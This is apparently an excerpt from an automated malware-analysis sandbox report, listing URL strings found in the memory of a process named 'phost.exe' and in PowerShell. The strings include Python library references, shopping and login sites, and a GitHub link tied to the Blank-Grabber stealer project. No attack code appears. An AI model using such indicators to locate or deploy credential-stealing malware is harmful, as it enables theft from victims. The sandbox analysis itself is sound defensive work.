              Source: phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: phost.exe, 00000001.00000003.1702435717.000001AE1D5F8000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702994368.000001AE1D630000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1CFA0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684583206.000001AE1CFAA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684912540.000001AE1CFA2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1684728779.000001AE1CFA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704494690.000001AE1D381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urlli
              Source: phost.exe, 00000001.00000002.2178966357.000001AE1DA0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: phost.exe, 00000001.00000003.1854068522.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1886265486.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1817643168.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
              Source: phost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C716575000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2175758589.000001AE1D383000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177552719.000001AE1D385000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1832092199.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D718000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704273079.000001AE1D718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E964000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8F0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E97C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000C.00000002.1792042705.000002119FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C7259B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1977970654.000001C71739C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.2029247692.000001C725AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
              Source: svchost.exe, 00000014.00000003.1751303220.000001E22D906000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C7170AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000004A.00000002.1977970654.000001C7170AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: phost.exe, 00000001.00000003.1704273079.000001AE1D771000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178858146.000001AE1D8A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: phost.exe, 00000001.00000002.2177140880.000001AE1D0A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: phost.exe, 00000001.00000002.2176893974.000001AE1D044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: phost.exe, 00000001.00000003.1816470539.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702313330.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1704441144.000001AE1D329000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1885946451.000001AE1D336000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848757509.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169952863.000001AE1D338000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177462355.000001AE1D338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
              Source: phost.exe, 00000000.00000003.1679692860.000001C32AC81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: phost.exe, 00000001.00000003.2172658215.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1861089530.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853423748.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D7B9000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/produ
              Source: phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: phost.exe, 00000001.00000003.2167660271.000001AE1E69E000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169808101.000001AE1E0D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2167660271.000001AE1E6C3000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: phost.exe, 00000001.00000003.2167660271.000001AE1E69E000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2169808101.000001AE1E0D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: phost.exe, 00000001.00000002.2177248707.000001AE1D1A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: phost.exe, 00000001.00000003.1842261128.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1856459466.000001AE1D6F0000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D6F1000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1851038862.000001AE1D6F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: phost.exe, 00000001.00000002.2179089914.000001AE1DAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: phost.exe, 00000001.00000002.2178966357.000001AE1D9A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1862017771.000001AE1E691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: phost.exe, 00000001.00000003.2169554554.000001AE1E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: phost.exe, 00000001.00000003.2172658215.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1861089530.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DBB8000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1853423748.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2166653178.000001AE1D86C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: phost.exe, 00000001.00000003.1854068522.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1849010645.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837339893.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177248707.000001AE1D269000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D851000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0D2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
              Source: phost.exe, 00000001.00000003.1853895159.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1836777377.000001AE1D85A000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177509778.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1815420180.000001AE1D359000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864387686.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1848923148.000001AE1D368000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1837150497.000001AE1E0E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1864030272.000001AE1D35D000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1845215076.000001AE1E0E2000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1871682113.000001AE1D361000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176893974.000001AE1CFB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
              Source: phost.exe, 00000001.00000003.1845215076.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857564523.000001AE1E0F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: phost.exe, 00000001.00000003.1866119745.000001AE1E6F6000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179807278.000001AE1E6EA000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E974000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E90C000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: phost.exe, 00000000.00000003.1678869412.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2183688641.00007FFDFB1A9000.00000004.00000001.01000000.0000000A.sdmp, phost.exe, 00000001.00000002.2182303838.00007FFDFAB28000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: phost.exe, 00000001.00000003.1687852160.000001AE1CFFE000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2176648071.000001AE1CC60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB6E2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: phost.exe, 00000001.00000003.2173409124.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2180428095.000001AE1E8D0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D79F000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2179183258.000001AE1DC84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
